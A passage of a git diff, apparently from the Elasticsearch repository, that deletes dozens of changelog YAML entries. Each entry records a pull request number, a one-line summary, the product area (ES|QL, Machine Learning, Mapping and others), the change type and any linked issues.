b/docs/changelog/123396.yaml deleted file mode 100644 index 9b3ff753fb7f6..0000000000000 --- a/docs/changelog/123396.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123396 -summary: Add initial grammar and planning for RRF (snapshot) -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/123460.yaml b/docs/changelog/123460.yaml deleted file mode 100644 index 17c665cb1069b..0000000000000 --- a/docs/changelog/123460.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 123460 -summary: "ES|QL: Support `::date` in inline cast" -area: ES|QL -type: enhancement -issues: - - 116746 diff --git a/docs/changelog/123543.yaml b/docs/changelog/123543.yaml deleted file mode 100644 index 1e3f2893a7c19..0000000000000 --- a/docs/changelog/123543.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 123543 -summary: Enhance memory accounting for document expansion and introduce max document - size limit -area: CRUD -type: enhancement -issues: [] diff --git a/docs/changelog/123588.yaml b/docs/changelog/123588.yaml deleted file mode 100644 index bea2fc56b9502..0000000000000 --- a/docs/changelog/123588.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123588 -summary: Give Kibana user 'all' permissions for .entity_analytics.* indices -area: Infra/Core -type: enhancement -issues: [] diff --git a/docs/changelog/123630.yaml b/docs/changelog/123630.yaml deleted file mode 100644 index 10a12f1508cb9..0000000000000 --- a/docs/changelog/123630.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 123630 -summary: Limit number of suppressed S3 deletion errors -area: Snapshot/Restore -type: bug -issues: - - 123354 diff --git a/docs/changelog/123712.yaml b/docs/changelog/123712.yaml deleted file mode 100644 index b3ae3c5a8fda4..0000000000000 --- a/docs/changelog/123712.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123712 -summary: Process ILM cluster state updates on another thread -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/123763.yaml b/docs/changelog/123763.yaml deleted file mode 100644 index 3b9428e0de7bc..0000000000000 --- a/docs/changelog/123763.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123763 -summary: Skip semantic_text embedding generation when no content is provided. -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/123852.yaml b/docs/changelog/123852.yaml deleted file mode 100644 index 8a7f9af9e7d36..0000000000000 --- a/docs/changelog/123852.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123852 -summary: Retry when the server can't be resolved (Google Cloud Storage) -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/124025.yaml b/docs/changelog/124025.yaml deleted file mode 100644 index 8ec9a0fd1c537..0000000000000 --- a/docs/changelog/124025.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124025 -summary: "[Inference API] Propagate product use case http header to EIS" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/124050.yaml b/docs/changelog/124050.yaml deleted file mode 100644 index 352678dd4bb5a..0000000000000 --- a/docs/changelog/124050.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124050 -summary: Use `FallbackSyntheticSourceBlockLoader` for boolean and date fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/124094.yaml b/docs/changelog/124094.yaml deleted file mode 100644 index b4c0f1711815f..0000000000000 --- a/docs/changelog/124094.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124094 -summary: ES|QL slow log -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124177.yaml b/docs/changelog/124177.yaml deleted file mode 100644 index 4fe40cf3722c6..0000000000000 --- a/docs/changelog/124177.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124177 -summary: "Improve error message for ( and [" -area: ES|QL -type: bug -issues: - - 124145 diff --git a/docs/changelog/124313.yaml b/docs/changelog/124313.yaml deleted file mode 100644 index fc4d4d9d815e4..0000000000000 --- a/docs/changelog/124313.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124313 -summary: Optimize memory usage in `ShardBulkInferenceActionFilter` -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/124394.yaml b/docs/changelog/124394.yaml deleted file mode 100644 index 086b66f71a7cb..0000000000000 --- a/docs/changelog/124394.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124394 -summary: Avoid `NamedWritable` in block serialization -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124564.yaml b/docs/changelog/124564.yaml deleted file mode 100644 index ebfc2593db19a..0000000000000 --- a/docs/changelog/124564.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124564 -summary: Restore `TextSimilarityRankBuilder` XContent output -area: Ranking -type: bug -issues: [] diff --git a/docs/changelog/124574.yaml b/docs/changelog/124574.yaml deleted file mode 100644 index 32e49b4cfd9c4..0000000000000 --- a/docs/changelog/124574.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124574 -summary: Allow passing several reserved state chunks in single process call -area: Infra/Settings -type: enhancement -issues: [] diff --git a/docs/changelog/124581.yaml b/docs/changelog/124581.yaml deleted file mode 100644 index cc978981b1efc..0000000000000 --- a/docs/changelog/124581.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124581 -summary: New `vector_rescore` parameter as a quantized index type option -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/124594.yaml b/docs/changelog/124594.yaml deleted file mode 100644 index 08417c1304c38..0000000000000 --- a/docs/changelog/124594.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124594 -summary: Store arrays offsets for numeric fields natively with synthetic source -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/124595.yaml b/docs/changelog/124595.yaml deleted file mode 100644 index 7afd0541b6231..0000000000000 --- a/docs/changelog/124595.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124595 -summary: '`ToAggregateMetricDouble` function' -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/124610.yaml b/docs/changelog/124610.yaml deleted file mode 100644 index 2afd41dffa3ba..0000000000000 --- a/docs/changelog/124610.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124610 -summary: Remove page alignment in exchange sink -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124638.yaml b/docs/changelog/124638.yaml deleted file mode 100644 index 34b1369767fd5..0000000000000 --- a/docs/changelog/124638.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124638 -summary: Provide model size statistics as soon as an anomaly detection job is opened -area: Machine Learning -type: bug -issues: - - 121168 diff --git a/docs/changelog/124676.yaml b/docs/changelog/124676.yaml deleted file mode 100644 index 94b52127e92e5..0000000000000 --- a/docs/changelog/124676.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124676 -summary: TO_LOWER processes all values -area: ES|QL -type: bug -issues: - - 124002 diff --git a/docs/changelog/124690.yaml b/docs/changelog/124690.yaml deleted file mode 100644 index 07b17e8c64bdf..0000000000000 --- a/docs/changelog/124690.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124690 -summary: Avoid creating known_fields for every check in Alias -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/124708.yaml b/docs/changelog/124708.yaml deleted file mode 100644 index 8585eede63215..0000000000000 --- a/docs/changelog/124708.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124708 -summary: Throw exception for unknown token in RestIndexPutAliasAction -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/124722.yaml b/docs/changelog/124722.yaml deleted file mode 100644 index 9bbfd846ef2eb..0000000000000 --- a/docs/changelog/124722.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124722 -summary: Add panama implementations of byte-bit and float-bit script operations -area: Vector Search -type: enhancement -issues: - - 117096 diff --git a/docs/changelog/124737.yaml b/docs/changelog/124737.yaml deleted file mode 100644 index d7a3b370d72d4..0000000000000 --- a/docs/changelog/124737.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124737 -summary: Throw exception for unsupported values type in Alias -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/124738.yaml b/docs/changelog/124738.yaml deleted file mode 100644 index dd2d20af5e7e4..0000000000000 --- a/docs/changelog/124738.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124738 -summary: Upgrade AWS v2 SDK to 2.30.38 -area: Machine Learning -type: upgrade -issues: [] diff --git a/docs/changelog/124823.yaml b/docs/changelog/124823.yaml deleted file mode 100644 index 1c87fc263bdbf..0000000000000 --- a/docs/changelog/124823.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124823 -summary: Report failures on partial results -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/124825.yaml b/docs/changelog/124825.yaml deleted file mode 100644 index 413695a5ae641..0000000000000 --- a/docs/changelog/124825.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124825 -summary: Check alias during update -area: Transform -type: bug -issues: [] diff --git a/docs/changelog/124832.yaml b/docs/changelog/124832.yaml deleted file mode 100644 index dd471e265c612..0000000000000 --- a/docs/changelog/124832.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124832 -summary: List/get query API -area: ES|QL -type: feature -issues: - - 124827 diff --git a/docs/changelog/124841.yaml b/docs/changelog/124841.yaml deleted file mode 100644 index 6f945054224e0..0000000000000 --- a/docs/changelog/124841.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124841 -summary: Pass `IndexReshardingMetadata` over the wire -area: Distributed -type: bug -issues: [] diff --git a/docs/changelog/124898.yaml b/docs/changelog/124898.yaml deleted file mode 100644 index 9542bd571a4bd..0000000000000 --- a/docs/changelog/124898.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124898 -summary: Add cache support in `TransportGetAllocationStatsAction` -area: Allocation -type: enhancement -issues: - - 110716 diff --git a/docs/changelog/124901.yaml b/docs/changelog/124901.yaml deleted file mode 100644 index d67bfb4defdba..0000000000000 --- a/docs/changelog/124901.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124901 -summary: Calculate concurrent node limit -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/124913.yaml b/docs/changelog/124913.yaml deleted file mode 100644 index 3b8f6c24b096d..0000000000000 --- a/docs/changelog/124913.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124913 -summary: Report `original_types` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124927.yaml b/docs/changelog/124927.yaml deleted file mode 100644 index 7b3c5b4663ff0..0000000000000 --- a/docs/changelog/124927.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124927 -summary: Use `FallbackSyntheticSourceBlockLoader` for `shape` and `geo_shape` -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/124929.yaml b/docs/changelog/124929.yaml deleted file mode 100644 index 92f1528760b83..0000000000000 --- a/docs/changelog/124929.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124929 -summary: Include failures in partial response -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124966.yaml b/docs/changelog/124966.yaml deleted file mode 100644 index 7e962a795a485..0000000000000 --- a/docs/changelog/124966.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124966 -summary: Use logs dir as working directory -area: Infra/CLI -type: enhancement -issues: [] diff --git a/docs/changelog/125054.yaml b/docs/changelog/125054.yaml deleted file mode 100644 index 20c8674754a32..0000000000000 --- a/docs/changelog/125054.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125054 -summary: Truncate `step_info` and error reason in ILM execution state and history -area: ILM+SLM -type: enhancement -issues: - - 124181 diff --git a/docs/changelog/125062.yaml b/docs/changelog/125062.yaml deleted file mode 100644 index 04dd5ea4e273f..0000000000000 --- a/docs/changelog/125062.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125062 -summary: "Add initial version (behind snapshot) of `multi_match` function #121525" -area: Search -type: feature -issues: [121525] diff --git a/docs/changelog/125117.yaml b/docs/changelog/125117.yaml deleted file mode 100644 index 23395d6439044..0000000000000 --- a/docs/changelog/125117.yaml +++ /dev/null @@ -1,8 +0,0 @@ -pr: 125117 -summary: "Permanently switch from Java SecurityManager to Entitlements. - The Java SecurityManager has been deprecated since Java 17, and it is now completely disabled in Java 24. In order - to retain an similar level of protection, Elasticsearch implemented its own protection mechanism, Entitlements. - Starting with this version, Entitlements will permanently replace the Java SecurityManager." -area: Infra/Core -type: upgrade -issues: [] diff --git a/docs/changelog/125191.yaml b/docs/changelog/125191.yaml deleted file mode 100644 index ced55c2d2ecc6..0000000000000 --- a/docs/changelog/125191.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125191 -summary: Fix sorting when `aggregate_metric_double` present -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125204.yaml b/docs/changelog/125204.yaml deleted file mode 100644 index de0ca932aafe0..0000000000000 --- a/docs/changelog/125204.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125204 -summary: Return a Conflict status code if the model deployment is stopped by a user -area: Machine Learning -type: bug -issues: - - 123745 diff --git a/docs/changelog/125213.yaml b/docs/changelog/125213.yaml deleted file mode 100644 index 3793e83d1e162..0000000000000 --- a/docs/changelog/125213.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125213 -summary: Run `TransportGetDataStreamOptionsAction` on local node -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/125214.yaml b/docs/changelog/125214.yaml deleted file mode 100644 index 7a72e09e73426..0000000000000 --- a/docs/changelog/125214.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125214 -summary: Run `TransportGetDataStreamLifecycleAction` on local node -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/125239.yaml b/docs/changelog/125239.yaml deleted file mode 100644 index 60ec9bb0b7177..0000000000000 --- a/docs/changelog/125239.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125239 -summary: Adding common rerank options to Perform Inference API -area: Machine Learning -type: enhancement -issues: - - 111273 diff --git a/docs/changelog/125244.yaml b/docs/changelog/125244.yaml deleted file mode 100644 index 9458f44643c23..0000000000000 --- a/docs/changelog/125244.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125244 -summary: Disable logging in `ClusterFormationFailureHelper` on shutdown -area: Cluster Coordination -type: bug -issues: - - 105559 diff --git a/docs/changelog/125259.yaml b/docs/changelog/125259.yaml deleted file mode 100644 index f390886469749..0000000000000 --- a/docs/changelog/125259.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125259 -summary: Leverage scorer supplier in `QueryFeatureExtractor` -area: Ranking -type: enhancement -issues: [] diff --git a/docs/changelog/125357.yaml b/docs/changelog/125357.yaml deleted file mode 100644 index 70964f6f48b45..0000000000000 --- a/docs/changelog/125357.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125357 -summary: Keep ordinals in conversion functions -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125403.yaml b/docs/changelog/125403.yaml deleted file mode 100644 index d953dae4db4fe..0000000000000 --- a/docs/changelog/125403.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125403 -summary: First step optimizing tsdb doc values codec merging -area: Codec -type: enhancement -issues: [] diff --git a/docs/changelog/125452.yaml b/docs/changelog/125452.yaml deleted file mode 100644 index e12d9c7b69b6a..0000000000000 --- a/docs/changelog/125452.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125452 -summary: Add GCS telemetry with `ThreadLocal` -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/125477.yaml b/docs/changelog/125477.yaml deleted file mode 100644 index 316f7a7cba2da..0000000000000 --- a/docs/changelog/125477.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125477 -summary: Prevent get datafeeds stats API returning an error when local tasks are slow to stop -area: Machine Learning -type: bug -issues: - - 104160 diff --git a/docs/changelog/125479.yaml b/docs/changelog/125479.yaml deleted file mode 100644 index efc31441254c5..0000000000000 --- a/docs/changelog/125479.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125479 -summary: ES|QL - Allow full text functions to be used in STATS -area: ES|QL -type: enhancement -issues: - - 125481 diff --git a/docs/changelog/125517.yaml b/docs/changelog/125517.yaml deleted file mode 100644 index 993a32960c876..0000000000000 --- a/docs/changelog/125517.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125517 -summary: Semantic Text Chunking Indexing Pressure -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/125520.yaml b/docs/changelog/125520.yaml deleted file mode 100644 index 71172b2137dc0..0000000000000 --- a/docs/changelog/125520.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125520 -summary: Add `FailedShardEntry` info to shard-failed task source string -area: Allocation -type: enhancement -issues: - - 102606 diff --git a/docs/changelog/125529.yaml b/docs/changelog/125529.yaml deleted file mode 100644 index b90327afa16d3..0000000000000 --- a/docs/changelog/125529.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125529 -summary: Store arrays offsets for boolean fields natively with synthetic source -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/125562.yaml b/docs/changelog/125562.yaml deleted file mode 100644 index 1e53662fabb7e..0000000000000 --- a/docs/changelog/125562.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125562 -summary: Improve handling of empty response -area: Infra/REST API -type: bug -issues: - - 57639 diff --git a/docs/changelog/125570.yaml b/docs/changelog/125570.yaml deleted file mode 100644 index ede177c666470..0000000000000 --- a/docs/changelog/125570.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125570 -summary: ES|QL random sampling -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/125599.yaml b/docs/changelog/125599.yaml deleted file mode 100644 index e0057f50dd937..0000000000000 --- a/docs/changelog/125599.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125599 -summary: Allow zero for `rescore_vector.oversample` to indicate by-passing oversample - and rescoring -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/125631.yaml b/docs/changelog/125631.yaml deleted file mode 100644 index 32917bb1da060..0000000000000 --- a/docs/changelog/125631.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125631 -summary: Add `documents_found` and `values_loaded` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125652.yaml b/docs/changelog/125652.yaml deleted file mode 100644 index 59a69964a0967..0000000000000 --- a/docs/changelog/125652.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125652 -summary: Run `TransportGetIndexAction` on local node -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/125690.yaml b/docs/changelog/125690.yaml deleted file mode 100644 index 00129675840a4..0000000000000 --- a/docs/changelog/125690.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125690 -summary: Take double parameter markers for identifiers out of snapshot -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125699.yaml b/docs/changelog/125699.yaml deleted file mode 100644 index 29ee24da4c974..0000000000000 --- a/docs/changelog/125699.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125699 -summary: Adding `NormalizeForStreamProcessor` -area: Ingest Node -type: feature -issues: [] diff --git a/docs/changelog/125709.yaml b/docs/changelog/125709.yaml deleted file mode 100644 index 4979633208ceb..0000000000000 --- a/docs/changelog/125709.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125709 -summary: Store arrays offsets for unsigned long fields natively with synthetic source -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/125739.yaml b/docs/changelog/125739.yaml deleted file mode 100644 index cc5fa57b0f09b..0000000000000 --- a/docs/changelog/125739.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125739 -summary: Heuristics to pick efficient partitioning -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125816.yaml b/docs/changelog/125816.yaml deleted file mode 100644 index aa43e2c766699..0000000000000 --- a/docs/changelog/125816.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125816 -summary: Use `FallbackSyntheticSourceBlockLoader` for point and `geo_point` -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/125832.yaml b/docs/changelog/125832.yaml deleted file mode 100644 index 4877a02e9e6d0..0000000000000 --- a/docs/changelog/125832.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125832 -summary: "ESQL: Fix `NULL` handling in `IN` clause" -area: ES|QL -type: bug -issues: - - 119950 diff --git a/docs/changelog/125896.yaml b/docs/changelog/125896.yaml deleted file mode 100644 index 92c2d2712f853..0000000000000 --- a/docs/changelog/125896.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125896 -summary: Support explicit Z/M attributes using WKT geometry -area: Geo -type: enhancement -issues: [123111] diff --git a/docs/changelog/125930.yaml b/docs/changelog/125930.yaml deleted file mode 100644 index 9bf7d18545772..0000000000000 --- a/docs/changelog/125930.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125930 -summary: Infer the score mode to use from the Lucene collector -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/126002.yaml b/docs/changelog/126002.yaml deleted file mode 100644 index 4879d38ab4675..0000000000000 --- a/docs/changelog/126002.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126002 -summary: Run `TransportGetLifecycleAction` on local node -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/126008.yaml b/docs/changelog/126008.yaml deleted file mode 100644 index e905bde32e433..0000000000000 --- a/docs/changelog/126008.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126008 -summary: Accumulate compute() calls and iterations between convergences -area: Allocation -type: enhancement -issues: - - 100850 diff --git a/docs/changelog/126009.yaml b/docs/changelog/126009.yaml deleted file mode 100644 index cd398938d1a1b..0000000000000 --- a/docs/changelog/126009.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126009 -summary: Change ModelLoaderUtils.split to return the correct number of chunks and ranges. -area: Machine Learning -type: bug -issues: - - 121799 diff --git a/docs/changelog/126035.yaml b/docs/changelog/126035.yaml deleted file mode 100644 index 1a96205e476e7..0000000000000 --- a/docs/changelog/126035.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126035 -summary: Fix top level knn search with scroll -area: Vector Search -type: bug -issues: [] diff --git a/docs/changelog/126038.yaml b/docs/changelog/126038.yaml deleted file mode 100644 index 65eabdb7937db..0000000000000 --- a/docs/changelog/126038.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126038 -summary: Mark `rescore_vector` as generally available -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/126051.yaml b/docs/changelog/126051.yaml deleted file mode 100644 index cffdb587b242c..0000000000000 --- a/docs/changelog/126051.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126051 -summary: Run `TransportGetSettingsAction` on local node -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/126087.yaml b/docs/changelog/126087.yaml deleted file mode 100644 index 94d5c5e0c28ba..0000000000000 --- a/docs/changelog/126087.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126087 -summary: Upgrade to repository-gcs to use com.google.cloud:google-cloud-storage-bom:2.50.0 -area: Snapshot/Restore -type: upgrade -issues: [] diff --git a/docs/changelog/126091.yaml b/docs/changelog/126091.yaml deleted file mode 100644 index beba808c96fc6..0000000000000 --- a/docs/changelog/126091.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126091 -summary: Allow balancing weights to be set per tier -area: Allocation -type: enhancement -issues: [] diff --git a/docs/changelog/126237.yaml b/docs/changelog/126237.yaml deleted file mode 100644 index 24f245a528795..0000000000000 --- a/docs/changelog/126237.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126237 -summary: Use `FallbackSyntheticSourceBlockLoader` for text fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/126264.yaml b/docs/changelog/126264.yaml deleted file mode 100644 index e2c4c6e4a8695..0000000000000 --- a/docs/changelog/126264.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126264 -summary: '`FileWatchingService` shoudld not throw for missing file' -area: Infra/Settings -type: enhancement -issues: [] diff --git a/docs/changelog/126296.yaml b/docs/changelog/126296.yaml deleted file mode 100644 index 55affb6ab4c79..0000000000000 --- a/docs/changelog/126296.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126296 -summary: Fail with 500 not 400 for `ValueExtractor` bugs -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/126314.yaml b/docs/changelog/126314.yaml deleted file mode 100644 index 8d16788f8b0c0..0000000000000 --- a/docs/changelog/126314.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126314 -summary: Add refresh to synonyms put / delete APIs to wait for synonyms to be accessible and reload analyzers -area: Analysis -type: bug -issues: - - 121441 diff --git a/docs/changelog/126319.yaml b/docs/changelog/126319.yaml deleted file mode 100644 index c8e84df61ad06..0000000000000 --- a/docs/changelog/126319.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126319 -summary: COMPLETION command grammar and logical plan -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/126372.yaml b/docs/changelog/126372.yaml deleted file mode 100644 index 75345296d8392..0000000000000 --- a/docs/changelog/126372.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126372 -summary: Add `IndexingPressureMonitor` to monitor large indexing operations -area: CRUD -type: enhancement -issues: [] diff --git a/docs/changelog/126385.yaml b/docs/changelog/126385.yaml deleted file mode 100644 index c59d1f15c6eae..0000000000000 --- a/docs/changelog/126385.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126385 -summary: Filter out empty top docs results before merging -area: Search -type: bug -issues: - - 126118 diff --git a/docs/changelog/126397.yaml b/docs/changelog/126397.yaml deleted file mode 100644 index 49e43ccf04a57..0000000000000 --- a/docs/changelog/126397.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126397 -summary: "ESQL: Preserve single aggregate when all attributes are pruned" -area: ES|QL -type: bug -issues: - - 126392 diff --git a/docs/changelog/126401.yaml b/docs/changelog/126401.yaml deleted file mode 100644 index 227a6c5a61795..0000000000000 --- a/docs/changelog/126401.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126401 -summary: Add pinned retriever -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/126409.yaml b/docs/changelog/126409.yaml deleted file mode 100644 index 7c5401faefa78..0000000000000 --- a/docs/changelog/126409.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126409 -summary: System data streams are not being upgraded in the feature migration API -area: Infra/Core -type: bug -issues: - - 122949 diff --git a/docs/changelog/126417.yaml b/docs/changelog/126417.yaml deleted file mode 100644 index 8fd456becacdb..0000000000000 --- a/docs/changelog/126417.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126417 -summary: Correctly handle nulls in nested paths in the remove processor -area: Ingest Node -type: bug -issues: [] diff --git a/docs/changelog/126452.yaml b/docs/changelog/126452.yaml deleted file mode 100644 index a67c1db5211d2..0000000000000 --- a/docs/changelog/126452.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126452 -summary: Run `newShardSnapshotTask` tasks concurrently -area: Snapshot/Restore -type: bug -issues: [] diff --git a/docs/changelog/126493.yaml b/docs/changelog/126493.yaml deleted file mode 100644 index 84a54b1058827..0000000000000 --- a/docs/changelog/126493.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126493 -summary: Bedrock Cohere Task Settings Support -area: Machine Learning -type: enhancement -issues: - - 126156 diff --git a/docs/changelog/126529.yaml b/docs/changelog/126529.yaml deleted file mode 100644 index e8beaf3fba4a9..0000000000000 --- a/docs/changelog/126529.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126529 -summary: "Batch ILM policy cluster state updates [#122917]" -area: ILM+SLM -type: enhancement -issues: - - 122917 diff --git a/docs/changelog/126532.yaml b/docs/changelog/126532.yaml deleted file mode 100644 index dff3094c31ad8..0000000000000 --- a/docs/changelog/126532.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126532 -summary: TO_IP can handle leading zeros -area: ES|QL -type: bug -issues: - - 125460 diff --git a/docs/changelog/126537.yaml b/docs/changelog/126537.yaml deleted file mode 100644 index 46ed789bd6768..0000000000000 --- a/docs/changelog/126537.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126537 -summary: Fix ELAND endpoints not updating dimensions -area: Machine Learning -type: bug -issues: [] diff --git a/docs/changelog/126550.yaml b/docs/changelog/126550.yaml deleted file mode 100644 index 3bc1e9332afcf..0000000000000 --- a/docs/changelog/126550.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126550 -summary: Add leniency to missing array values in mustache -area: Infra/Scripting -type: bug -issues: - - 55200 diff --git a/docs/changelog/126562.yaml b/docs/changelog/126562.yaml deleted file mode 100644 index a02ae0aacd018..0000000000000 --- a/docs/changelog/126562.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 126562 -summary: Add a custom `toString` to `DynamicMap` -area: Infra/Scripting -type: bug -issues: - - 70262 diff --git a/docs/changelog/126578.yaml b/docs/changelog/126578.yaml deleted file mode 100644 index c65ef197e8a30..0000000000000 --- a/docs/changelog/126578.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 126578 -summary: Retrieve token text only when necessary -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/126581.yaml b/docs/changelog/126581.yaml deleted file mode 100644 index 53fcb8a6057b3..0000000000000 --- a/docs/changelog/126581.yaml +++ /dev/null @@ -1,10 +0,0 @@ -pr: 126581 -summary: "Optimize shared blob cache evictions on shard removal - Shared blob cache evictions occur on the 